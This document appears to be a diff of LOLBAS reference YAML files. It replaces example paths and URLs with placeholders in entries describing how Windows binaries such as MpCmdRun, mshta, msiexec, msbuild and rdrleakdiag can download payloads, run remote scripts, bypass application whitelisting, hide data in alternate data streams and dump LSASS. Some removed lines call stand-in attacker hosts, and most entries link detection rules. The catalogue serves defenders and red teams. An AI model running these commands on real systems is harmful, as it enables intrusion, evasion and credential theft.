 Created: 2018-10-22
 Commands:
-  - Command: Microsoft.Workflow.Compiler.exe tests.xml results.xml
+  - Command: Microsoft.Workflow.Compiler.exe {PATH} {PATH:.log}
-    Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.xml file.
+    Description: Compile and execute C# or VB.net code in a XOML file referenced in the first argument (any extension accepted).
    Usecase: Compile and run code
    Category: Execute
    Privileges: User
@ -14,7 +14,7 @@ Commands:
    Tags:
      - Execute: VB.Net
      - Execute: Csharp
-  - Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt
+  - Command: Microsoft.Workflow.Compiler.exe {PATH} {PATH:.log}
    Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.
    Usecase: Compile and run code
    Category: Execute
@ -23,7 +23,7 @@ Commands:
    OperatingSystem: Windows 10S, Windows 11
    Tags:
      - Execute: XOML
-  - Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt
+  - Command: Microsoft.Workflow.Compiler.exe {PATH} {PATH:.log}
    Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.
    Usecase: Compile and run code
    Category: AWL Bypass
@ -34,8 +34,6 @@ Commands:
      - Execute: XOML
 Full_Path:
  - Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_workflow_compiler.yml
  - Splunk: https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/suspicious_microsoft_workflow_compiler_usage.yml
--- a/yml/OSBinaries/Mmc.yml
+++ b/yml/OSBinaries/Mmc.yml
@ -4,7 +4,7 @@ Description: Load snap-ins to locally and remotely manage Windows systems
 Author: '@bohops'
 Created: 2018-12-04
 Commands:
-  - Command: mmc.exe -Embedding c:\path\to\test.msc
+  - Command: mmc.exe -Embedding {PATH_ABSOLUTE:.msc}
    Description: Launch a 'backgrounded' MMC process and invoke a COM payload
    Usecase: Configure a snap-in to load a COM custom class (CLSID) that has been added to the registry
    Category: Execute
@ -25,8 +25,6 @@ Commands:
 Full_Path:
  - Path: C:\Windows\System32\mmc.exe
  - Path: C:\Windows\SysWOW64\mmc.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mmc_susp_child_process.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/file/file_event/file_event_win_uac_bypass_dotnet_profiler.yml
--- a/yml/OSBinaries/MpCmdRun.yml
+++ b/yml/OSBinaries/MpCmdRun.yml
@ -1,26 +1,26 @@
 ---
 Name: MpCmdRun.exe
 Description: Binary part of Windows Defender. Used to manage settings in Windows Defender
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2020-03-20
 Commands:
-  - Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\beacon.exe
+  - Command: MpCmdRun.exe -DownloadFile -url {REMOTEURL:.exe} -path {PATH_ABSOLUTE:.exe}
    Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path)
    Usecase: Download file
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows 10
-  - Command: copy "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" C:\Users\Public\Downloads\MP.exe && chdir "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\" && "C:\Users\Public\Downloads\MP.exe" -DownloadFile -url https://attacker.server/beacon.exe -path C:\Users\Public\Downloads\evil.exe
+  - Command: copy "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" C:\Users\Public\Downloads\MP.exe && chdir "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\" && "C:\Users\Public\Downloads\MP.exe" -DownloadFile -url {REMOTEURL:.exe} -path C:\Users\Public\Downloads\evil.exe
    Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path) [updated version to bypass Windows 10 mitigation]
    Usecase: Download file
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows 10
-  - Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\temp\nicefile.txt:evil.exe
+  - Command: MpCmdRun.exe -DownloadFile -url {REMOTEURL:.exe} -path {PATH_ABSOLUTE:.exe}:evil.exe
    Description: Download file to machine and store it in Alternate Data Stream
-    Usecase: Hide downloaded data inton an Alternate Data Stream
+    Usecase: Hide downloaded data into an Alternate Data Stream
    Category: ADS
    Privileges: User
    MitreID: T1564.004
@ -32,8 +32,6 @@ Full_Path:
  - Path: C:\Program Files\Windows Defender\MpCmdRun.exe
  - Path: C:\Program Files (x86)\Windows Defender\MpCmdRun.exe
  - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23110.3-0\X86\MpCmdRun.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/159bf4bbc103cc2be3fef4b7c2e7c8b23b63fd10/rules/windows/process_creation/win_susp_mpcmdrun_download.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/6ef5c53b0c15e344f0f2d1649941391aea6fa253/rules/windows/command_and_control_remote_file_copy_mpcmdrun.toml
@ -53,6 +51,5 @@ Acknowledgement:
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
  - Person: RichRumble
    Handle: ''
  - Person: Cedric
    Handle: '@th3c3dr1c'
--- a/yml/OSBinaries/Msbuild.yml
+++ b/yml/OSBinaries/Msbuild.yml
@ -1,10 +1,10 @@
 ---
 Name: Msbuild.exe
 Description: Used to compile and execute code
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
-  - Command: msbuild.exe pshell.xml
+  - Command: msbuild.exe {PATH:.xml}
    Description: Build and execute a C# project stored in the target XML file.
    Usecase: Compile and run code
    Category: AWL Bypass
@ -13,7 +13,7 @@ Commands:
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: CSharp
-  - Command: msbuild.exe project.csproj
+  - Command: msbuild.exe {PATH:.csproj}
    Description: Build and execute a C# project stored in the target csproj file.
    Usecase: Compile and run code
    Category: Execute
@ -22,8 +22,8 @@ Commands:
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: CSharp
-  - Command: msbuild.exe /logger:TargetLogger,C:\Loggers\TargetLogger.dll;MyParameters,Foo
+  - Command: msbuild.exe /logger:TargetLogger,{PATH_ABSOLUTE:.dll};MyParameters,Foo
-    Description: Executes generated Logger DLL file with TargetLogger export
+    Description: Executes generated Logger DLL file with TargetLogger export.
    Usecase: Execute DLL
    Category: Execute
    Privileges: User
@ -31,8 +31,8 @@ Commands:
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: DLL
-  - Command: msbuild.exe project.proj
+  - Command: msbuild.exe {PATH:.proj}
-    Description: Execute jscript/vbscript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+.
+    Description: Execute JScript/VBScript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+.
    Usecase: Execute project file that contains XslTransformation tag parameters
    Category: Execute
    Privileges: User
@ -40,7 +40,7 @@ Commands:
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: XSL
-  - Command: msbuild.exe @sample.rsp
+  - Command: msbuild.exe @{PATH:.rsp}
    Description: By putting any valid msbuild.exe command-line options in an RSP file and calling it as above will interpret the options as if they were passed on the command line.
    Usecase: Bypass command-line based detections
    Category: Execute
@ -57,8 +57,6 @@ Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe
  - Path: C:\Program Files (x86)\MSBuild\14.0\bin\MSBuild.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_msbuild_susp_parent_process.yml
--- a/yml/OSBinaries/Msconfig.yml
+++ b/yml/OSBinaries/Msconfig.yml
@ -1,7 +1,7 @@
 ---
 Name: Msconfig.exe
 Description: MSConfig is a troubleshooting tool which is used to temporarily disable or re-enable software, device drivers or Windows services that run during startup process to help the user determine the cause of a problem with Windows
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
  - Command: Msconfig.exe -5
--- a/yml/OSBinaries/Msdt.yml
+++ b/yml/OSBinaries/Msdt.yml
@ -1,11 +1,11 @@
 ---
 Name: Msdt.exe
 Description: Microsoft diagnostics tool
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
-  - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
+  - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af {PATH_ABSOLUTE:.xml} /skip TRUE
-    Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
+    Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the .xml file.
    Usecase: Execute code
    Category: Execute
    Privileges: User
@ -14,8 +14,8 @@ Commands:
    Tags:
      - Application: GUI
      - Execute: MSI
-  - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
+  - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af {PATH_ABSOLUTE:.xml} /skip TRUE
-    Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
+    Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the .xml file.
    Usecase: Execute code bypass Application whitelisting
    Category: AWL Bypass
    Privileges: User
--- a/yml/OSBinaries/Msedge.yml
+++ b/yml/OSBinaries/Msedge.yml
@ -4,22 +4,22 @@ Description: Microsoft Edge browser
 Author: mr.d0x
 Created: 2022-01-20
 Commands:
-  - Command: msedge.exe https://example.com/file.exe.txt
+  - Command: msedge.exe {REMOTEURL:.exe.txt}
-    Description: Edge will launch and download the file. A harmless file extension (e.g. .txt, .zip) should be appended to avoid SmartScreen.
+    Description: Edge will launch and download the file. A 'harmless' file extension (e.g. .txt, .zip) should be appended to avoid SmartScreen.
    Usecase: Download file from the internet
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows 10, Windows 11
-  - Command: msedge.exe --headless --enable-logging --disable-gpu --dump-dom "http://example.com/evil.b64.html" > out.b64
+  - Command: msedge.exe --headless --enable-logging --disable-gpu --dump-dom "{REMOTEURL:.base64.html}" > {PATH:.b64}
    Description: Edge will silently download the file. File extension should be .html and binaries should be encoded.
    Usecase: Download file from the internet
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows 10, Windows 11
-  - Command: msedge.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c ping google.com &&"
+  - Command: msedge.exe --disable-gpu-sandbox --gpu-launcher="{CMD} &&"
-    Description: Edge spawns cmd.exe as a child process of msedge.exe and executes the ping command
+    Description: Edge spawns cmd.exe as a child process of msedge.exe and executes the specified command
    Usecase: Executes a process under a trusted Microsoft signed binary
    Category: Execute
    Privileges: User
--- a/yml/OSBinaries/Mshta.yml
+++ b/yml/OSBinaries/Mshta.yml
@ -4,7 +4,7 @@ Description: Used by Windows to execute html applications. (.hta)
 Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
-  - Command: mshta.exe evilfile.hta
+  - Command: mshta.exe {PATH:.hta}
    Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
    Usecase: Execute code
    Category: Execute
@ -14,7 +14,7 @@ Commands:
    Tags:
      - Execute: HTA
      - Execute: Remote
-  - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")"))
+  - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:{REMOTEURL:.sct}"")"))
    Description: Executes VBScript supplied as a command line argument.
    Usecase: Execute code
    Category: Execute
@ -23,7 +23,7 @@ Commands:
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: VBScript
-  - Command: mshta.exe javascript:a=GetObject("script:https://webserver/payload.sct").Exec();close();
+  - Command: mshta.exe javascript:a=GetObject("script:{REMOTEURL:.sct}").Exec();close();
    Description: Executes JavaScript supplied as a command line argument.
    Usecase: Execute code
    Category: Execute
@ -32,7 +32,7 @@ Commands:
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: JScript
-  - Command: mshta.exe "C:\ads\file.txt:file.hta"
+  - Command: mshta.exe "{PATH_ABSOLUTE}:file.hta"
    Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
    Usecase: Execute code hidden in alternate data stream
    Category: ADS
@ -41,7 +41,7 @@ Commands:
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 (Does not work on 1903 and newer)
    Tags:
      - Execute: HTA
-  - Command: mshta.exe https://example.com/payload
+  - Command: mshta.exe {REMOTEURL}
    Description: It will download a remote payload and place it in INetCache.
    Usecase: Downloads payload from remote server
    Category: Download
--- a/yml/OSBinaries/Msiexec.yml
+++ b/yml/OSBinaries/Msiexec.yml
@ -1,10 +1,10 @@
 ---
 Name: Msiexec.exe
 Description: Used by Windows to execute msi files
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
-  - Command: msiexec /quiet /i cmd.msi
+  - Command: msiexec /quiet /i {PATH:.msi}
    Description: Installs the target .MSI file silently.
    Usecase: Execute custom made msi file with attack code
    Category: Execute
@ -13,7 +13,7 @@ Commands:
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: MSI
-  - Command: msiexec /q /i http://192.168.100.3/tmp/cmd.png
+  - Command: msiexec /q /i {REMOTEURL}
    Description: Installs the target remote & renamed .MSI file silently.
    Usecase: Execute custom made msi file with attack code from remote server
    Category: Execute
@ -23,7 +23,7 @@ Commands:
    Tags:
      - Execute: MSI
      - Execute: Remote
-  - Command: msiexec /y "C:\folder\evil.dll"
+  - Command: msiexec /y {PATH_ABSOLUTE:.dll}
    Description: Calls DllRegisterServer to register the target DLL.
    Usecase: Execute dll files
    Category: Execute
@ -33,7 +33,7 @@ Commands:
    Tags:
      - Execute: DLL
      - Execute: Remote
-  - Command: msiexec /z "C:\folder\evil.dll"
+  - Command: msiexec /z {PATH_ABSOLUTE:.dll}
    Description: Calls DllUnregisterServer to un-register the target DLL.
    Usecase: Execute dll files
    Category: Execute
@ -43,7 +43,7 @@ Commands:
    Tags:
      - Execute: DLL
      - Execute: Remote
-  - Command: msiexec /i "https://trustedURL/signed.msi" TRANSFORMS="https://evilurl/evil.mst" /qb
+  - Command: msiexec /i {PATH_ABSOLUTE:.msi} TRANSFORMS="{REMOTEURL:.mst}" /qb
    Description: Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a transformation file will be used, which can contains malicious code or binaries. The /qb will skip user input.
    Usecase: Install trusted and signed msi file, with additional attack code as transformation file, from a remote server
    Category: Execute
--- a/yml/OSBinaries/Netsh.yml
+++ b/yml/OSBinaries/Netsh.yml
@ -1,10 +1,10 @@
 ---
 Name: Netsh.exe
 Description: Netsh is a Windows tool used to manipulate network interface settings.
-Author: 'Freddie Barr-Smith'
+Author: Freddie Barr-Smith
 Created: 2019-12-24
 Commands:
-  - Command: netsh.exe add helper C:\Users\User\file.dll
+  - Command: netsh.exe add helper {PATH_ABSOLUTE:.dll}
    Description: Use Netsh in order to execute a .dll file and also gain persistence, every time the netsh command is called
    Usecase: Proxy execution of .dll
    Category: Execute
--- a/yml/OSBinaries/Ngen.yml
+++ b/yml/OSBinaries/Ngen.yml
@ -4,7 +4,7 @@ Description: Microsoft Native Image Generator.
 Author: Avihay Eldad
 Created: 2024-02-19
 Commands:
-  - Command: ngen.exe http://example.com/calc.exe
+  - Command: ngen.exe {REMOTEURL}
    Description: Downloads payload from remote server using the Microsoft Native Image Generator utility.
    Usecase: It will download a remote payload and place it in INetCache.
    Category: Download
--- a/yml/OSBinaries/Odbcconf.yml
+++ b/yml/OSBinaries/Odbcconf.yml
@ -1,12 +1,12 @@
 ---
 Name: Odbcconf.exe
 Description: Used in Windows for managing ODBC connections
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
-  - Command: odbcconf /a {REGSVR c:\test\test.dll}
+  - Command: odbcconf /a {REGSVR {PATH_ABSOLUTE:.dll}}
-    Description: Execute DllREgisterServer from DLL specified.
+    Description: Execute DllRegisterServer from DLL specified.
-    Usecase: Execute dll file using technique that can evade defensive counter measures
+    Usecase: Execute a DLL file using technique that can evade defensive counter measures
    Category: Execute
    Privileges: User
    MitreID: T1218.008
@ -14,7 +14,7 @@ Commands:
    Tags:
      - Execute: DLL
  - Command: |
-      odbcconf INSTALLDRIVER "lolbas-project|Driver=c:\test\test.dll|APILevel=2"
+      odbcconf INSTALLDRIVER "lolbas-project|Driver={PATH_ABSOLUTE:.dll}|APILevel=2"
      odbcconf configsysdsn "lolbas-project" "DSN=lolbas-project"
    Description: Install a driver and load the DLL. Requires administrator privileges.
    Usecase: Execute dll file using technique that can evade defensive counter measures
@ -24,7 +24,7 @@ Commands:
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: DLL
-  - Command: odbcconf -f file.rsp
+  - Command: odbcconf -f {PATH:.rsp}
    Description: Load DLL specified in target .RSP file. See the Code Sample section for an example .RSP file.
    Usecase: Execute dll file using technique that can evade defensive counter measures
    Category: Execute
--- a/yml/OSBinaries/Pcalua.yml
+++ b/yml/OSBinaries/Pcalua.yml
@ -1,10 +1,10 @@
 ---
 Name: Pcalua.exe
 Description: Program Compatibility Assistant
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
-  - Command: pcalua.exe -a calc.exe
+  - Command: pcalua.exe -a {PATH:.exe}
    Description: Open the target .EXE using the Program Compatibility Assistant.
    Usecase: Proxy execution of binary
    Category: Execute
@ -13,7 +13,7 @@ Commands:
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: EXE
-  - Command: pcalua.exe -a \\server\payload.dll
+  - Command: pcalua.exe -a {PATH_SMB:.dll}
    Description: Open the target .DLL file with the Program Compatibilty Assistant.
    Usecase: Proxy execution of remote dll file
    Category: Execute
@ -23,7 +23,7 @@ Commands:
    Tags:
      - Execute: DLL
      - Execute: Remote
-  - Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java
+  - Command: pcalua.exe -a {PATH_ABSOLUTE:.cpl} -c Java
    Description: Open the target .CPL file with the Program Compatibility Assistant.
    Usecase: Execution of CPL files
    Category: Execute
--- a/yml/OSBinaries/Pcwrun.yml
+++ b/yml/OSBinaries/Pcwrun.yml
@ -1,10 +1,10 @@
 ---
 Name: Pcwrun.exe
 Description: Program Compatibility Wizard
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
-  - Command: Pcwrun.exe c:\temp\beacon.exe
+  - Command: Pcwrun.exe {PATH_ABSOLUTE:.exe}
    Description: Open the target .EXE file with the Program Compatibility Wizard.
    Usecase: Proxy execution of binary
    Category: Execute
--- a/yml/OSBinaries/Pktmon.yml
+++ b/yml/OSBinaries/Pktmon.yml
@ -1,7 +1,7 @@
 ---
 Name: Pktmon.exe
 Description: Capture Network Packets on the windows 10 with October 2018 Update or later.
-Author: 'Derek Johnson'
+Author: Derek Johnson
 Created: 2020-08-12
 Commands:
  - Command: pktmon.exe start --etw
@ -21,8 +21,6 @@ Commands:
 Full_Path:
  - Path: c:\windows\system32\pktmon.exe
  - Path: c:\windows\syswow64\pktmon.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_pktmon.yml
  - IOC: .etl files found on system
@ -30,4 +28,3 @@ Resources:
  - Link: https://binar-x79.com/windows-10-secret-sniffer/
 Acknowledgement:
  - Person: Derek Johnson
    Handle: ''
--- a/yml/OSBinaries/Pnputil.yml
+++ b/yml/OSBinaries/Pnputil.yml
@ -4,7 +4,7 @@ Description: Used for installing drivers
 Author: Hai vaknin (lux)
 Created: 2020-12-25
 Commands:
-  - Command: pnputil.exe -i -a C:\Users\hai\Desktop\mo.inf
+  - Command: pnputil.exe -i -a {PATH_ABSOLUTE:.inf}
    Description: Used for installing drivers
    Usecase: Add malicious driver
    Category: Execute
--- a/yml/OSBinaries/Presentationhost.yml
+++ b/yml/OSBinaries/Presentationhost.yml
@ -4,16 +4,16 @@ Description: File is used for executing Browser applications
 Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
-  - Command: Presentationhost.exe C:\temp\Evil.xbap
+  - Command: Presentationhost.exe {PATH_ABSOLUTE:.xbap}
    Description: Executes the target XAML Browser Application (XBAP) file
-    Usecase: Execute code within xbap files
+    Usecase: Execute code within XBAP files
    Category: Execute
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
    Tags:
      - Execute: XBAP
-  - Command: Presentationhost.exe https://example.com/payload
+  - Command: Presentationhost.exe {REMOTEURL}
    Description: It will download a remote payload and place it in INetCache.
    Usecase: Downloads payload from remote server
    Category: Download
--- a/yml/OSBinaries/Print.yml
+++ b/yml/OSBinaries/Print.yml
@ -1,24 +1,24 @@
 ---
 Name: Print.exe
 Description: Used by Windows to send files to the printer
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
-  - Command: print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe
+  - Command: print /D:{PATH_ABSOLUTE}:file.exe {PATH_ABSOLUTE:.exe}
    Description: Copy file.exe into the Alternate Data Stream (ADS) of file.txt.
    Usecase: Hide binary file in alternate data stream to potentially bypass defensive counter measures
    Category: ADS
    Privileges: User
    MitreID: T1564.004
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-  - Command: print /D:C:\ADS\CopyOfFile.exe C:\ADS\FileToCopy.exe
+  - Command: print /D:{PATH_ABSOLUTE:.dest.exe} {PATH_ABSOLUTE:.source.exe}
-    Description: Copy FileToCopy.exe to the target C:\ADS\CopyOfFile.exe
+    Description: Copy file from source to destination
    Usecase: Copy files
    Category: Copy
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
-  - Command: print /D:C:\OutFolder\outfile.exe \\WebDavServer\Folder\File.exe
+  - Command: print /D:{PATH_ABSOLUTE:.dest.exe} {PATH_SMB:.source.exe}
    Description: Copy File.exe from a network share to the target c:\OutFolder\outfile.exe.
    Usecase: Copy/Download file from remote server
    Category: Copy
@ -28,8 +28,6 @@ Commands:
 Full_Path:
  - Path: C:\Windows\System32\print.exe
  - Path: C:\Windows\SysWOW64\print.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_print_remote_file_copy.yml
  - IOC: Print.exe retrieving files from internet
--- a/yml/OSBinaries/PrintBrm.yml
+++ b/yml/OSBinaries/PrintBrm.yml
@ -1,10 +1,10 @@
 ---
 Name: PrintBrm.exe
 Description: Printer Migration Command-Line Tool
-Author: 'Elliot Killick'
+Author: Elliot Killick
 Created: 2021-06-21
 Commands:
-  - Command: PrintBrm -b -d \\1.2.3.4\share\example_folder -f C:\Users\user\Desktop\new.zip
+  - Command: PrintBrm -b -d {PATH_SMB:folder} -f {PATH_ABSOLUTE:.zip}
    Description: Create a ZIP file from a folder in a remote drive
    Usecase: Exfiltrate the contents of a remote folder on a UNC share into a zip file
    Category: Download
@ -13,7 +13,7 @@ Commands:
    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Type: Compression
-  - Command: PrintBrm -r -f C:\Users\user\Desktop\data.txt:hidden.zip -d C:\Users\user\Desktop\new_folder
+  - Command: PrintBrm -r -f {PATH_ABSOLUTE}:hidden.zip -d {PATH_ABSOLUTE:folder}
    Description: Extract the contents of a ZIP file stored in an Alternate Data Stream (ADS) and store it in a folder
    Usecase: Decompress and extract a ZIP file stored on an alternate data stream to a new folder
    Category: ADS
--- a/yml/OSBinaries/Provlaunch.yml
+++ b/yml/OSBinaries/Provlaunch.yml
@ -5,7 +5,7 @@ Author: Grzegorz Tworek
 Created: 2023-06-30
 Commands:
  - Command: provlaunch.exe LOLBin
-    Description: 'Executes command defined in the Registry. Requires 3 levels of the key structure containing some keywords. Such keys may be created with two reg.exe commands, e.g. "reg.exe add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1 /v altitude /t REG_DWORD /d 0" and "reg add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1\dummy2 /v Commandline /d calc.exe". Registry keys are deleted after successful execution.'
+    Description: 'Executes command defined in the Registry. Requires 3 levels of the key structure containing some keywords. Such keys may be created with two reg.exe commands, e.g. `reg.exe add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1 /v altitude /t REG_DWORD /d 0` and `reg add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1\dummy2 /v Commandline /d calc.exe`. Registry keys are deleted after successful execution.'
    Usecase: Executes arbitrary command
    Category: Execute
    Privileges: Administrator
--- a/yml/OSBinaries/Psr.yml
+++ b/yml/OSBinaries/Psr.yml
@ -4,7 +4,7 @@ Description: Windows Problem Steps Recorder, used to record screen and clicks.
 Author: Leon Rodenko
 Created: 2020-06-27
 Commands:
-  - Command: psr.exe /start /output D:\test.zip /sc 1 /gui 0
+  - Command: psr.exe /start /output {PATH_ABSOLUTE:.zip} /sc 1 /gui 0
    Description: Record a user screen without creating a GUI. You should use "psr.exe /stop" to stop recording and create output file.
    Usecase: Can be used to take screenshots of the user environment
    Category: Reconnaissance
@ -14,8 +14,6 @@ Commands:
 Full_Path:
  - Path: c:\windows\system32\psr.exe
  - Path: c:\windows\syswow64\psr.exe
 Code_Sample:
  - Code:
 Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_psr_capture_screenshots.yml
  - IOC: psr.exe spawned
--- a/yml/OSBinaries/Rasautou.yml
+++ b/yml/OSBinaries/Rasautou.yml
@ -1,10 +1,10 @@
 ---
 Name: Rasautou.exe
 Description: Windows Remote Access Dialer
-Author: 'Tony Lambert'
+Author: Tony Lambert
 Created: 2020-01-10
 Commands:
-  - Command: rasautou -d powershell.dll -p powershell -a a -e e
+  - Command: rasautou -d {PATH:.dll} -p export_name -a a -e e
    Description: Loads the target .DLL specified in -d and executes the export specified in -p. Options removed in Windows 10.
    Usecase: Execute DLL code
    Category: Execute
--- a/yml/OSBinaries/Rdrleakdiag.yml
+++ b/yml/OSBinaries/Rdrleakdiag.yml
@ -4,21 +4,21 @@ Description: Microsoft Windows resource leak diagnostic tool
 Author: 'John Dwyer'
 Created: 2022-05-18
 Commands:
-  - Command: rdrleakdiag.exe /p 940 /o c:\evil /fullmemdmp /wait 1
+  - Command: rdrleakdiag.exe /p 940 /o {PATH_ABSOLUTE:folder} /fullmemdmp /wait 1
    Description: Dump process by PID and create a dump file (Creates files called minidump_<PID>.dmp and results_<PID>.hlk).
    Usecase: Dump process by PID.
    Category: Dump
    Privileges: User
    MitreID: T1003
    OperatingSystem: Windows
-  - Command: rdrleakdiag.exe /p 832 /o c:\evil /fullmemdmp /wait 1
+  - Command: rdrleakdiag.exe /p 832 /o {PATH_ABSOLUTE:folder} /fullmemdmp /wait 1
    Description: Dump LSASS process by PID and create a dump file (Creates files called minidump_<PID>.dmp and results_<PID>.hlk).
    Usecase: Dump LSASS process.
    Category: Dump
    Privileges: Administrator
    MitreID: T1003.001
    OperatingSystem: Windows
-  - Command: rdrleakdiag.exe /p 832 /o c:\evil /fullmemdmp /snap
+  - Command: rdrleakdiag.exe /p 832 /o {PATH_ABSOLUTE:folder} /fullmemdmp /snap
    Description: After dumping a process using /wait 1, subsequent dumps must use /snap (Creates files called minidump_<PID>.dmp and results_<PID>.hlk).
    Usecase: Dump LSASS process mutliple times.
    Category: Dump
@ -28,8 +28,6 @@ Commands:
 Full_Path:
  - Path: c:\windows\system32\rdrleakdiag.exe
  - Path: c:\Windows\SysWOW64\rdrleakdiag.exe
 Code_Sample:
  - Code:
 Detection:
